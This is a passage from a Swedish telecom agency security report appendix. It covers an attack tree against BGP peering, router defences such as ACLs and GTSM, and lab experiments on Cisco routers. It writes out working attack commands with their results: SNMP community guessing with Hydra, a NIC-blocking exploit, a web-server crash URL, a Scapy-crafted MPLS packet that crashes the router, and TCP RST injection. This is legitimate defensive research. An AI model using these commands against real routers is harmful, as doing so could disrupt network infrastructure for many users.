51
Contents - APPENDIX 3
Attack-träd
Störa peeringförbindelse
Bryta TCPförbindelse
Blockera
router
(2)
Blockera
NIC
(7)
Belasta
input-kö
Inducera
krasch/omstart
(1)
Inducera
CPU-belastning
(4)
(14)
Ruttdeaggregering
Kommandoexekvering
Injicera
genom BGP
(11)
Hög addressdiversitet
DoS genom
skräddarsytt
paket
IP options
Multicasttrafik
(5)
TCP
RST/SYN
(13)
Update-belastning
(10)
Reflektionsattack
Lura TCP
(3)
Kontrollplan
Skräddarsytt (9)
MPLS-paket
Inducera slow path
Skräddarsytt
IPv6-paket
Direkt
attack
Förfalska
ICMP
Inducera
minnesbelastning
Trafikplan
Attackera
webbserver
(8)
Skräddarsytt
paket
Injicera falsk
BGP-rutt
Lyckad
attack mot
IGP-protokoll
Kapa
peering
Insider
(lokal)
ACK-storm
Injicera
genom IGP
Kontrollplansaccess (BGP)
(12)
(15)
(16)
TCP-förbindelsekapning
Layer 2
lokal attack
&
&
(6)
Kända/gissade
ändpunkter
Routerintrång
Tysta
motpart
(19)
(17)
Kända/gissade
sekvensnummer
Attackera
webbserver
ARP-baserad
attack
&
Src/dst IP
traceroutes
Handel med
“ägda” routrar
Lösenordsgissning
Bufferöverskridningsattack
(8)
(18)SNMP community
Kommandoexekvering
OS-identifiering
guessing
Skräddarsytt
IPv6-paket
[Text for figure above:
Attack tree
Break a TCP
connection
Block
router
Traffic layer
Block
NIC
Overload
input queue
Crafted
packet
Direct
attack
Disrupt peering connection
Induce
Induce
crash/restart
CPU load
Attack
web server
Verification layer
Induce
memory loading
Inject
false BGP route
Crafted
MPLS packet
Induce slow path
Crafted
IPv6 packet
Reflection
attack
Trick TCP
Command
execution
Update load
High address
diversity
IP options
Multicast
traffic
DoS through
Route
deaggregation
Inject
through BGP
Control level
access (BGP)
Inject
through
IGP
crafted packet
Falsify
ICMP
TCP
RST/SYN
ACK storm
Insider
(local)
TCP connection
hijacking
&
&
Known/guessed
52
Known/guessed
Layer 2
local attack
Hijack
peering
Successful
attack on
IGP protocol
Trading with
'owned' routers
Router
intrusion
Silence
counterparty
National Post and Telecom Agency
- APPENDIX 3
termination points sequence numbers
&
Src/dst IP OS identification
traceroutes
ARP-based
attack
Attack
web servers
Password
guessing
Command
execution
SNMP community
guessing
Buffer overload
attack
Crafted
IPu6 packet]
Figure 2. Attack tree with the aim of disrupting or influencing a peering connection
Each node in the tree consists of a final objective or sub-objective for an attack. The branches
for each node have a logical 'or' co-relation, except in cases where special 'and' nodes have
been used to indicate several conditions/sub-objectives that must be satisfied.
Comments for Figure 2:
1) cisco-bug-44020 [21]: This vulnerability was verified by interrupting a peering
session in a lab environment on a Cisco 2600 with IOS 12.2. The peering session was
interrupted and stays down until the router is restarted. This problem was corrected in
later versions of IOS.
2) Simple DoS attack on the input queue for packets to the router's central processor.
3) Management of ICMP protocol unreachable, path MTU discovery, and source
quench [25]. Requires that the source and destination IP as well as port number are
known or can be guessed.
4) TCP RST or SYN packet: requires that the source and destination IP as well as port
numbers are known or can be guessed and that the sequence number can be guessed
within the window [26]. However, it should be noted that: i) iBGP connections use
normal loopback IP addresses that cannot be seen using traceroutes, ii) in order to
effectively be able to guess the source port (TCP source port), the operating system
version should be recognised with high precision, which is difficult in practice, iii)
higher levels of MD5 protection of peering sessions are currently used due to the
publication of [26].
5) TCP synchronisation errors: require that the source and destination IP as well as
port number are known or can be guessed and that the sequence numbers are known
or can be guessed very accurately. If a segment is injected in the connection, the
sequence numbers will become irregular, which will result in a 'storm' of ACK
messages for resynchronising the connection. However, the connection is eventually
broken.
6) A prerequisite for most attacks against the TCP coupler is that the attacker can find or
guess the termination points, i.e. the source IP (src-IP), the destination IP (dst-IP), the
source port (src-port), and the destination port (dst-port). The destination port is
known. The number of alternatives that need to be guessed for the source port can
probably be drastically reduced if the OS version is known [26]. Traceroutes from
several places and certain methods for identifying the interface on the same router are
required for identifying IP addresses. A loopback interface is generally used on
internal connections (iBGP), which is why IP addresses cannot be identified and have
to be guessed.
7) Attacks on a web configuration interface: require the web configuration to be
activated. The HTTP server in old versions of IOS is vulnerable to a type of DoS
attack with crafted packets. If the web server has not been configured correctly so that
it is unprotected, it may be possible to give configuration commands. In older
versions, it may also be possible to carry out intrusions in the router by exploiting
buffer overflows in the web server.
8) A crafted IPv6 packet exploiting a buffer overflow vulnerability [27] has been used
to demonstrate intrusion with configuration privileges on a Cisco router. An easier
way of exploiting this vulnerability is simply to cause a reload. This requires the
configuration of IPv6 and has only been demonstrated from the same sub-network as
National Post and Telecom Agency
53
Contents - APPENDIX 3
9)
10)
11)
12)
13)
14)
15)
16)
17)
18)
19)
where the router is located. However, in order to test this vulnerability, more detailed
information about the vulnerability than the description provided in Cisco's advisory
is required.
Crafted MPLS packet: can lead to a reload under certain conditions [22]. Only
certain (especially somewhat smaller) router models are vulnerable to this type of
attack, and it must be carried out from the same sub-network.
When worms started to be spread, scanning traffic in some cases led to smaller
routers crashing due to CPU loads [19].
Traffic with IP options can potentially induce CPU load.
It is unclear whether multicast traffic could cause overload problems. [20]
Can a router be overloaded with high intensity BGP updates? This requires the
attacker to be able to steal a peering session.
Deaggregation of routes can result in memory overload. This was previously studied
in [23]. In practice, this requires the attacker to be able to steal a peering session.
Taking over a TCP session: requires, for example, that the source and destination IP
as well as port numbers are known or can be guessed and that the sequence number
can be guessed within the window. The opponent also has to be silenced.
Local attack against layer 2 protocol: requires the attacker to have established a
foothold in the local network where the peering connection is located, which can
either be between the ISP networks (eBGP) or within an ISP network (iBGP).
Password guessing against the Telnet, SSH or web configuration interfaces.
Additional password guessing may be necessary in order to gain configuration
privileges.
Community guessing against SNMP configuration interfaces: resembles password
guessing. May be followed by guessing the passwords stored in configuration files.
Buffer overflow attack on an open service or protocol function: for example, like
the widely publicised demonstration of a successful attack on an IPv6 vulnerability
[27]; see comment (8) or other vulnerabilities [24].
Compared with the attack tree against BGP described by Convery, Cook and Franz in [6], we
have two specific objectives here: being able to redirect traffic, or somehow disrupt a peering
coupler. This constitutes the basic attack mechanism that may subsequently be utilised to
achieve a more substantial disruption. We have also expanded the tree in certain respects; for
example, with tangible attacks that indirectly affect BGP, such as (1), (2) and (8). On the other
hand, we have excluded a number of sub-objectives based on 'social engineering', as these are
unsuitable for the experiments. In some cases, we can instead make assumptions about the
attacker by means of social engineering or insiders being able to achieve the equivalent subobjectives.
1.4
Protection principles
The previous section may suggest that it is relatively easy for an attacker to cause damage.
However, in order to provide a fairer picture, the various protective measures that are available
should also be taken into account, many of which have recently been developed along with
increased security awareness. Here, we discuss a selection to demonstrate how many attacks
can be blocked and the security gaps that may possibly remain.
1.4.1 Protecting routers
Figure 3 below illustrates the protective mechanisms against DoS and some other types of
attack on large routers. Infrastructure ACLs (access control lists) and Receive ACLs can be
used to block traffic from IP addresses outside one's own network in order to gain access to the
infrastructure, i.e. send traffic to routers in the network. However, these must grant routing
traffic from external BGP peers access to the border routers. The Generalized TTL Security
Mechanism (GTSM) can be used to stop traffic to the border router from nodes that are located
further away than the peer router. In other words, all traffic that has travelled two hops or more
54
National Post and Telecom Agency
- APPENDIX 3
in a direct connection to the peer router is blocked to the border router. This could be compared
to establishing a 'trusted zone', from which traffic is allowed to access the border router. Traffic
addressed to the border router is put into an input queue on the line card before being picked up
by the router processor (the central CPU). If the queue is full, a prioritisation mechanism
known as 'Selective Packet Discard' is first used to discard normal traffic and save routing
traffic, as well as layer 2 control traffic, to avoid connectivity information being dropped.
Gränsrouter
Routeprocessor
Selectiv
paket-kastning
receive
path
inputkö
receive-ACLer
& GTSM
Linjekort
infrastrukturACLer
GTSM
⇒ “tillits-zon”
(Extern)
Peer
[Text for figure:
Border router
Route
processor
receive
path
Selective
Packet Discard
Input
queue
Line card
Receive ACLs
& GTSM
infrastructure
ACLs
GTSM
=> 'trusted zone'
(External)
Peer]
Figure 3. Protection against DoS and some other attacks on routers
An additional form of protection for impeding traffic from the outside to the infrastructure is to
as far as possible internally use address spaces that are not routed from outside, i.e. for which
National Post and Telecom Agency
55
Contents - APPENDIX 3
no routes are propagated to the outside. Traffic cannot reach the nodes as there are no routes.
However, once again it is somewhat more difficult to protect the border routers as these must
be reached for the exchange of routing information and one must instead depend on the GTSM
mechanism.
Thus, an attacker can get past infrastructure ACLs by falsifying (spoofing) sender's IP on oneway traffic to the border router. However, two-way traffic (e.g. TCP connections) is more
difficult, and getting round the GTSM protection is extremely difficult. One possibility of
getting round GTSM would be if the traffic could be tunnelled into a 'trusted zone', e.g. to the
external peer router. However, this also appears to be difficult if the existing tunnels have been
secured and the router, and possibly other machines on the sub-network, is protected.
1.4.2 Protecting routing information
Information in the system is currently protected by 'defensive filtering', where filters are added
to prevent incorrect information from entering the system and being propagated around.
However, for practical reasons it is impossible to achieve complete protection. As the routing
system comprises a large number of administratively separated parts, some form of
coordination is required in order to be able to design filters, and the Internet Routing Registry
was created for this very reason. The quality of the maintenance of the different objects in the
Routing Registry nevertheless varies, for which reason errors may arise due to old or incorrect
information. Even if it were possible to design perfect filters, there are practical barriers to
using them at all points in the network. Filtering can mainly take place in two ways: through
prefix filtering or AS path filtering. Combinations of these are also used. Prefix filtering is the
most precise. However, the global routing table currently comprises almost 300 000
destinations (prefixes), which means that central AS in the network would have to use filters
with nearly 300 000 rules. This presents a risk of problems with router performance as so many
rules have to be managed, and it is impractical to design and maintain configurations with so
many rules. AS path filtering (possibly in combination with prefix filters) is used extensively
since it can reduce the number of rules and thus simplify maintenance to some extent (but also
leads to somewhat less strict rules). However, in this case it is also impractical to attempt to
maintain comprehensive filtering rules between large ISPs. Therefore, there are currently
known inadequacies in the protection, which is mainly due to the considerable practical
difficulties in maintaining large amounts of route filtering rules.
This situation is illustrated in Figure 4. It is common for ISPs to filter information about routes
received from their customers, as these are of limited size and one has good control over what
the information ought to look like. Large ISPs sometimes require their customers to create
filters themselves that they can subsequently install in order to be able to filter the customers'
transit customers. It is impractical to filter between the largest ISPs because of the large
number of routes, while the situation at the lower levels varies as regards filtering when
peering. The result is that AS at the lower levels must depend in most cases on the information
received from above being correct, while attempting to protect the system from false
information leaking in from outside the core.
Proposals for cryptographic protective mechanisms in the protocol, such as S-BGP and
SoBGP, aim to provide more comprehensive protection against false information being
propagated in the system.
56
National Post and Telecom Agency
- APPENDIX 3
peer/peer
Nivå-1
ISPer
AS b
defensiva
filter
ISPer
lägre
nivåer
Transit
kunder
AS c
AS a
defensiva
filter
defensiva
filter
Eventuella
defensiva
filter
Eventuella
defensiva
filter
kund
AS e
AS d
leverantör
defensiva
filter
AS f
defensiva
filter
AS g
AS h
defensiva
filter
AS i
[Text for figure:
Level 1
ISPs
customer
ISPs
lower
levels
supplier
Transit
customers
AS a
peer/peer
AS b
AS c
defensive filter
defensive filter
defensive filter
Possible
defensive
filter
Possible
defensive
filter
AS d
AS e
AS f
defensive
filter
defensive
filter
defensive
filter
AS g
AS h
AS i]
Figure 4. Defensive filtering to protect routing information in the system
National Post and Telecom Agency
57
Contents - APPENDIX 3
2 Experiments in lab networks
Experiments were conducted in three different lab networks (A, B and C) in order to verify
assumptions for carrying out previously known attacks and observing the local consequences
of these. Lab network A is a small, physically delimited test network with two small Cisco
routers and older OS versions. Here, initial experiments were conducted to test known attacks
and to develop tools. Lab network B consists of a Cisco 7500 router run by an operator for
experiments. The hardware is not completely representative of the operating network, but the
operating system IOS 12.0(30)S2 and the configuration are representative of the operating
network. Lab network C is also run by operators for experiments and consists of a number of
routers with representative software and hardware.
2.1
Initial experiments: lab network A
The initial experiments, aimed at making a first selection of available attack tools as well as
developing crafted tools, were conducted in a small test network constituting two small Cisco
routers, as illustrated by Figure 5. The equipment in this network consists of small routers with
relatively old versions of the operating system (IOS). On the one hand, this makes it possible to
test vulnerabilities that have been known for quite some time. On the other hand, however, the
specific vulnerabilities have been rectified in newer versions of the operating system and it is
likely that large operators already upgraded their equipment a long time ago. In this respect, the
experiments in lab networks B and C are more realistic.
Labb-nät A
192.168.234.0/24
D-link
switch
attack
laptop
Nessus/
sniffer
10.0.0.2
Zebra
10.0.0.5
Cisco 2500
IOS 11.2(18)
10.0.3.0/24
AS 3
10.0.0.3
Cisco 2600
IOS 12.2(10b)
peering
10.0.0.0/24
10.0.1.0/24
10.0.0.1AS
1
sniffer
hub
[Text for figure: Lab network A]
Figure 5. Small test network for initial experiments
58
National Post and Telecom Agency
- APPENDIX 3
The routers are connected to Omicron's internal network for configuration and the like by a
100Mb Ethernet switch, and are connected to each other by a 10Mb Ethernet hub. Each of
these routers represents one AS and advertises a prefix for its AS to the other router through
the private 10.0.0.0 network.
In order to mimic an external attacker, the attacks were generally initiated from a PC by the
switch on Omicron's internal network. A second PC was used to sniff packets on the hub and
register in detail how the peering session might be affected. A Nessus security scanner was
also run on this PC and could be directed at the routers to test known vulnerabilities.
The following sections present the results of the preliminary experiments involving different
types of attack directed at the peering session in this network. The starting point prior to these
experiments is the establishment of a peering connection:
C2600>sh ip route
Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B BGP
D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, ia - IS-IS
inter area
* - candidate default, U - per-user static route, o - ODR
P - periodic downloaded static route
Gateway of last resort is not set
C
B
C
S
192.168.234.0/24 is directly connected, FastEthernet0/0
10.0.0.0/24 is subnetted, 3 subnets
10.0.3.0 [20/0] via 10.0.0.3, 00:01:11
10.0.0.0 is directly connected, FastEthernet0/1
10.0.1.0 is directly connected, FastEthernet0/1
2.1.1 Initial reconnaissance
A survey and reconnaissance to find potential vulnerabilities are the first steps in an attack on a
network. We assumed a survey using traceroutes, after which a number of further measures
were tested.
2.1.1.1 Vulnerability scanning
Initially, vulnerability scanning with Nessus was carried out for both routers.
Stimuli:
Measurement
results:
Nessus was used to search for Cisco-related vulnerabilities on both
routers.
Nessus report
The old configuration files on the Cisco 2500 router were shown to contain the http server
header for web-based configuration (which is not default). This contains several well-known
vulnerabilities. For example, an attacker can easily access the configuration and command line
interface using a crafted URL. After the http server was shut down, no vulnerabilities were
reported for any of the routers. In order to check the Cisco routers, Nessus often depended on
being able to request the IOS version number from the SNMP server on the router and drawing
National Post and Telecom Agency
59
Contents - APPENDIX 3
conclusions about vulnerabilities from the version number. After a public Read-Only
Community ('public RO') had been configured on the Cisco 2600, a test of this provided
more reliable results, and a number of other known vulnerabilities were reported, for example:
• DoS vulnerability from MPLS packets
• DoS vulnerability from IPv6 packets (SecurityFocus bid 12369)
• DoS vulnerability from BGP packets (SecurityFocus bid 12370)
• DoS vulnerability in IOS (SecurityFocus bid 15275)
• DoS vulnerability from falsified ICMP messages (SecurityFocus bid 6823)
• Potential DoS vulnerability related to SSH (SecurityFocus bid 13042, 13043).
In other words, in order to be able to use Nessus to identify vulnerabilities, an attacker must in
practice be able to guess the community in order to get information from the SNMP server
(which must be turned on).
2.1.1.2 OS identification
A test of how accurately the machine and OS version can be identified from a distance (only
one hop). This is also known as 'OS fingerprinting'.
Stimuli:
Measurement
results:
nmap -O is used to try to identify the machine and OS version.
[root@agena]# nmap -O c2600
Starting nmap 3.70 ( http://www.insecure.org/nmap/ ) at
2006-05-02 15:59 CEST
...
Device type: router
Running: Cisco IOS 12.X
OS details: Cisco router running IOS 12.1.5-12.2.13a
[root@agena]# nmap -O c2500
Starting nmap 3.70 ( http://www.insecure.org/nmap/ ) at
2006-05-02 15:59 CEST
...
Device type: router|switch
Running: Cisco IOS 11.X
OS details: Cisco Router/Switch with IOS 11.2
For the Cisco 2600, nmap guesses the correct interval on a 'minor version', but not the exact
version. For the Cisco 2500, nmap guesses the correct version. Consequently, the precision
appears to be relatively good, but far from secure. More identification tools are available, but
these have not been tested.
60
National Post and Telecom Agency
- APPENDIX 3
2.1.1.3 SNMP community guessing
Hydra is a tool that automates the password-guessing process over several different
communication protocols. A test was conducted to check the function for guessing the SNMP
community.
Stimuli:
Measurement
results:
xhydra was run on the Cisco 2600 with a small guessing list.
[mili@agena hydra-5.2-src]$ hydra -P password.txt -t 4 -V
194.52.58.136 snmp
Hydra v5.2 (c) 2006 by van Hauser / THC - use allowed
only for legal purposes.
Hydra (http://www.thc.org) starting at 2006-08-28
10:48:52
[DATA] 4 tasks, 1 servers, 90 login tries (l:1/p:90), ~22
tries per task
[DATA] attacking service snmp on port 161
[ATTEMPT] target 194.52.58.136 - login "" - pass "cisco"
- child 0 - 1 of 90
[ATTEMPT] target 194.52.58.136 - login "" - pass "Cisco"
- child 1 - 2 of 90
...
[ATTEMPT] target 194.52.58.136 - login "" - pass
"in73rn37 " - child 2 - 87 of 90
[ATTEMPT] target 194.52.58.136 - login "" - pass
"ciscovoip " - child 3 - 88 of 90
[ATTEMPT] target 194.52.58.136 - login "" - pass "voip "
- child 0 - 89 of 90
[STATUS] attack finished for 194.52.58.136 (waiting for
childs to finish)
[ATTEMPT] target 194.52.58.136 - login "" - pass "ciscovoip" - child 1 - 90 of 90
Hydra (http://www.thc.org) finished at 2006-08-28
10:50:47
The tool reported a guessing rate of approximately 50 guesses per minute. Accelerating this by
means of exhaustive tests of all combinations is thus likely to take a long time. However, a
small number of well-chosen passwords combined with a well-chosen guessing list may
consequently involve a risk, particularly because the attack is very simple to carry out.
2.1.1.4 Alias identification (alias resolution)
An attacker needs to be able to make traceroutes from both directions and identify interfaces
belonging to the same router in order to find both termination points for a connection; this is
known as 'alias identification' ('alias resolution').
Stimuli:
Measurement
results:
The ally tool was tested using two IP addresses on the Cisco 2600.
[root@agena]# ./ally 192.168.234.64 10.0.0.1
0: from 192.168.234.64: id 57439, ttl 59/255
1: from 10.0.0.1: id 57440, ttl 58/255
2: from 192.168.234.64: id 57441, ttl 59/255
ip1=192.168.234.64 ip2=10.0.0.1 ipid return_ttl !out_ttl
!same_ip !b_returns_a !a_returns_b !cisco
The results from the tool suggest that heuristics based on the IP ID and the returned TTL value
indicate that the IP addresses belong to the same router, which is correct. Other methods
included in this tool did not successfully provide additional support for this conclusion. The IP
ID heuristic is assumed to be one of the better tests, but may nevertheless miss certain
National Post and Telecom Agency
61
Contents - APPENDIX 3
occurrences. A combination of tests is preferable for this reason. For the sake of comparison, a
test was also conducted with two IP addresses on different routers.
Stimuli:
Measurement
results:
The ally tool was tested using two IP addresses on different routers.
[root@agena ally-0.1.0]# ally 10.0.0.1 10.0.0.3
0: from 192.168.234.64: id 39, ttl 59/255
1: from 10.0.0.3: id 10055, ttl 58/255
ip1=10.0.0.1 ip2=10.0.0.3 !ipid return_ttl !out_ttl
!same_ip !b_returns_a !a_returns_b !cisco
In this case, the IP addresses were correctly identified as belonging to different machines.
2.1.2 DoS with crafted packets
A test of attacks with crafted packets that trigger certain documented bugs.
2.1.2.1 Blocking NIC (Cisco-bug-44020)
Specific combinations of values in the IPv4 packet head can block interface cards [21]. This
vulnerability was verified in both routers in the experiment network. The NIC status of the
Cisco 2600 was verified as normal prior to the attack:
FastEthernet0/1 is up, line protocol is up
Hardware is AmdFE, address is 00d0.bafe.3781 (bia 00d0.bafe.3781)
Internet address is 10.0.0.1/24
MTU 1500 bytes, BW 10000 Kbit, DLY 1000 usec,
reliability 255/255, txload 1/255, rxload 1/255
Encapsulation ARPA, loopback not set
Keepalive set (10 sec)
Half-duplex, 10Mb/s, 100BaseTX/FX
ARP type: ARPA, ARP Timeout 04:00:00
Last input 00:00:30, output 00:00:00, output hang never
Last clearing of "show interface" counters never
Input queue: 0/75/0/0 (size/max/drops/flushes); Total output drops:
0
Queueing strategy: fifo
Output queue :0/40 (size/max)
…
Stimuli:
Measurement
results:
62
An existing exploit code in cisco-bug-44020 directed at an interface used
by a peering session:
[root@agena cisco-bug-44020]# ./cisco-bug-44020
192.168.234.61 10.0.0.1 2 1000
DEBUG: Protocol: 103
DEBUG: Checksum: 30646
DEBUG: 45 10 00 14 0d 15 40 00 02 67 b6 77 c0 a8 ea 3d
0a 00 00 01
DEBUG: Wrote 20 bytes.
...
The interface status was checked with sh interfaces:
FastEthernet0/1 is up, line protocol is up
Hardware is AmdFE, address is 00d0.bafe.3781 (bia
00d0.bafe.3781)
Internet address is 10.0.0.1/24
MTU 1500 bytes, BW 10000 Kbit, DLY 1000 usec,
reliability 255/255, txload 1/255, rxload 1/255
Encapsulation ARPA, loopback not set
Keepalive set (10 sec)
Half-duplex, 10Mb/s, 100BaseTX/FX
National Post and Telecom Agency
- APPENDIX 3
ARP type: ARPA, ARP Timeout 04:00:00
Last input 00:00:56, output 00:00:01, output hang never
Last clearing of "show interface" counters never
Input queue: 76/75/881/0 (size/max/drops/flushes);
Total output drops: 0
Queueing strategy: fifo
Output queue :0/40 (size/max)
…
This indicates that the input queue is full. The BGP status was verified:
00:20:26: %BGP-5-ADJCHANGE: neighbor 10.0.0.3 Down BGP
Notification sent
00:20:26: %BGP-3-NOTIFICATION: sent to neighbor 10.0.0.3
4/0 (hold time expired) 0 bytes
C2600>sh ip route
Codes: C - connected, S - static, I - IGRP, R - RIP, M mobile, B - BGP
D - EIGRP, EX - EIGRP external, O - OSPF, IA OSPF inter area
N1 - OSPF NSSA external type 1, N2 - OSPF NSSA
external type 2
E1 - OSPF external type 1, E2 - OSPF external type
2, E - EGP
i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2,
ia - IS-IS inter area
* - candidate default, U - per-user static route,
o - ODR
P - periodic downloaded static route
Gateway of last resort is not set
C
192.168.234.0/24 is directly connected,
FastEthernet0/0
10.0.0.0/24 is subnetted, 2 subnets
C
10.0.0.0 is directly connected, FastEthernet0/1
S
10.0.1.0 is directly connected, FastEthernet0/1
This shows that the peering session has gone down.
As indicated in the description, the effect for both routers is that the interface is blocked. If the
attack is directed at an interface used by a peering session, then the session is interrupted and
the router must be restarted in order to resolve the problem.
2.1.2.2 Disruption from falsified ICMP packets
An attack using falsified ICMP packets [25]. This was tested against both the Cisco 2500 and
the Cisco 2600, each of which comprised one side of a peering connection. The TCP ports
need to be known for this attack and these were verified by packet sniffing prior to the
experiments.
Stimuli:
Test of ICMP protocol unreachable directed at the Cisco 2500:
HOD-icmp-attacks-poc -fi:10.0.0.1 -ti:10.0.0.3 -fp:11044
-tp:179 -n:2 -a:1
BGP status is verified on the router (show ip route).
Measurement
results:
No effect was observed.
More experiments were conducted where the number of packets varied. The same attack was
also tested against the Cisco 2600 with the same result.
Stimuli:
Measurement
results:
Test of ICMP MTU-path-discovery directed at the Cisco 2500:
HOD-icmp-attacks-poc -fi:10.0.0.1 -ti:10.0.0.3 -fp:11000
-tp:179 -n:1000 -a:2
BGP status is verified on the router (show ip route).
No effect was observed.
National Post and Telecom Agency
63
Contents - APPENDIX 3
Stimuli:
Measurement
results:
Test of ICMP source quench directed at the Cisco 2500:
HOD-icmp-attacks-poc -fi:10.0.0.1 -ti:10.0.0.3 -fp:11000
-tp:179 -n:1000 -a:3
BGP status is verified on the router (show ip route).
No effect was observed.
There was also no noticeable effect when using a large number of attack packets. According to
[29], a number of checks are actually made against the permission of the connection in IOS so
that the ICMP-related vulnerabilities occurring in other OSs are extremely limited IOSs. They
are restricted to less common ICMP messages combined with a few configurations and
versions of OS and hardware; and the combinations tested here are not vulnerable.
2.1.2.3 Web server attack to block the router
The attack involves sending a specially designed URL string ('http://<router-IP>/%%' )
to the web server on port 80/tcp and was tested in relation to both routers in the test network.
This attack requires the IOS http server to be activated in the router configuration.
Stimuli:
Existing Cisco Global Exploiter exploit code against the Cisco 2500:
perl cge.pl 10.0.0.3 2
Measurement
results:
The router freezes completely and must be restarted by turning the power off.
BGP status is verified on the Cisco 2600 (show ip route).
C2600>sh ip route
Codes: C - connected, S - static, I - IGRP, R - RIP, M mobile, B - BGP
D - EIGRP, EX - EIGRP external, O - OSPF, IA OSPF inter area
N1 - OSPF NSSA external type 1, N2 - OSPF NSSA
external type 2
E1 - OSPF external type 1, E2 - OSPF external type
2, E - EGP
i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2,
ia - IS-IS inter area
* - candidate default, U - per-user static route,
o - ODR
P - periodic downloaded static route
Gateway of last resort is not set
C
192.168.234.0/24 is directly connected,
FastEthernet0/0
10.0.0.0/24 is subnetted, 2 subnets
C
10.0.0.0 is directly connected, FastEthernet0/1
S
10.0.1.0 is directly connected, FastEthernet0/1
This indicates that the peering session has gone down.
The Cisco 2500 router running the older IOS 11.0 version is vulnerable to this attack and
freezes completely. The router must be restarted by turning the power off. Existing peering
sessions are subsequently also interrupted until the problem is resolved. The Cisco 2600, with a
newer IOS version, is not vulnerable.
64
National Post and Telecom Agency
- APPENDIX 3
2.1.2.4 Crafted MPLS packet
According to [22], some generally smaller Cisco routers with certain versions of IOS can be
made to crash and reload if someone sends an MPLS packet to the router on an interface that
has not been configured to deal with MPSL. However, the attack must be carried out from the
same sub-network as the vulnerable interface, since MAC addressing is used. The Cisco 2600
with the IOS version run on it is one of the vulnerable configurations, so the vulnerability was
tested on this router by writing a special code that enables packets with MPLS headers to be
generated.2
The packet generation tool, Scapy, written in Python, was modified so that it was possible to
add an MPLS 'shim header' to the packets generated. The status of the Cisco 2600 was verified
prior to the attack:
C2600>sh version
Cisco Internetwork Operating System Software
IOS (tm) C2600 Software (C2600-JK9O3S-M), Version 12.2(10b), RELEASE
SOFTWARE (fc1)
Copyright (c) 1986-2002 by cisco Systems, Inc.
Compiled Thu 11-Jul-02 20:50 by pwade
Image text-base: 0x80008088, data-base: 0x8157D180
ROM: System Bootstrap, Version 11.3(2)XA4, RELEASE SOFTWARE (fc1)
C2600 uptime is 5 weeks, 17 hours, 44 minutes
C2600>
Stimuli:
Specially written exploit code based on Scapy against the Cisco 2600:
Welcome to Scapy (1.0.0.30beta)
>>> p =
Ether(src="00:30:05:3B:09:F6",dst="00:D0:BA:FE:37:80")/MPL
S(label=1)/IP())
>>> Ether(str(p))
<Ether dst=00:d0:ba:fe:37:80 src=00:30:05:3b:09:f6
type=0x8847 |<MPLS label=1L exp=0L stack_bottom=1L ttl=255
|<IP version=4L ihl=5L tos=0x0 len=20 id=1 flags= frag=0L
ttl=64 proto=IP chksum=0x7ce7 src=127.0.0.1 dst=127.0.0.1
|>>>
>>> sendp(p,iface(="eth0")
.
Sent 1 packets.
>>>
Measurem
ent results
Status of Cisco 2600's console:
Unexpected exception to CPU vector 1100, PC = 0
-Traceback= 0 80027AE0 8038397C 8038966C 80349634 8037C4DC
8037C4DC 803496F4 805B7600 802A08EC 8034E1AC 8034AC58
80008118
=== Flushing messages (17:45:45 UTC Mon Apr 5 1993) ===
Queued messages:
Writing crashinfo to flash:crashinfo_19930405-174545
*** System received a SegV exception ***
signal= 0xb, code= 0x1100, context= 0x82182d58
PC = 0x0, Vector = 0x1100, SP = 0x82385628
2 When this experiment was conducted, the lab network had been reconfigured somewhat
compared with Figure 1 and Cisco 2600 had a peering session established with a router at another
location in the Internet. This is, however, of no importance to the experiment. What is important
is that the attack must start from the same sub-network as where Cisco 2600 is located.
National Post and Telecom Agency
65
Contents - APPENDIX 3
System Bootstrap, Version 11.3(2)XA4, RELEASE SOFTWARE
(fc1)
Copyright (c) 1999 by cisco Systems, Inc.
TAC:Home:SW:IOS:Specials for info
C2600 platform with 65536 Kbytes of main memory
program load complete, entry point: 0x80008000, size:
0xc1f340
Self decompressing the image :
#############################################
...
Router>sh ver
Cisco Internetwork Operating System Software
IOS (tm) C2600 Software (C2600-JK9O3S-M), Version
12.2(10b), RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2002 by cisco Systems, Inc.
Compiled Thu 11-Jul-02 20:50 by pwade
Image text-base: 0x80008088, data-base: 0x8157D180
ROM: System Bootstrap, Version 11.3(2)XA4, RELEASE
SOFTWARE (fc1)
Router uptime is 0 minutes
This shows that the router crashed and reloaded.
2.1.3 Attacks on a TCP coupler
Attacks on the TCP coupler were tested without activating the MD5 protection. The
experiments assumed that the attack was directed at an external peering connection (between
two AS) where addresses for physical interfaces are used, and successfully found the IP
addresses for a peering connection on both sides by means of traceroutes.3
2.1.3.1 DoS by means of TCP Reset and the like (RST, SYN or FIN)
Initial tests using TCP RST (Reset) packets to disrupt peering sessions [26] were conducted
after termination points and sequence numbers had been collected by packet sniffing.
Stimuli:
Result:
The tttr tool was used to send a small number of RST packets with guessed
sequence numbers including the known and correct number.
ttt --src 10.0.0.3 --dst 10.0.0.1 --sport 11001 --dport 179 -count 20 --rst --window 1000 --sequence 1205570000^ --delay 1
BGP status was verified on the router (show ip route).
C2600>sh ip route
Codes: C - connected, S - static, I - IGRP, R - RIP, M mobile, B - BGP
D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF
inter area
N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external
type 2
E1 - OSPF external type 1, E2 - OSPF external type 2, E
- EGP
i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, ia -
Loopback addresses, which cannot be detected using traceroutes but must be received from the
configuration or be guessed, are normally used for internal peering connections (iBGP-sessions).
3
66
National Post and Telecom Agency
- APPENDIX 3
IS-IS inter area
* - candidate default, U - per-user static route, o ODR
P - periodic downloaded static route
Gateway of last resort is not set
C
C
S
PREFIX1/24 is directly connected, FastEthernet0/0
10.0.0.0/24 is subnetted, 2 subnets
10.0.0.0 is directly connected, FastEthernet0/1
10.0.1.0 is directly connected, FastEthernet0/1
The peering connection was broken.
It was subsequently assumed that the port numbers were still known, while all possibilities of
the sequence number were guessed.
Stimuli:
Sequence number guessing across the entire possible spectrum:
Result
ttt --src 10.0.0.3 --dst 10.0.0.1 --sport 11001 --dport 179 -count 20 --rst --window 1000 --sequence 1205570000^ --delay 1
BGP status was verified on the router (show ip route).
This attack had no effect.
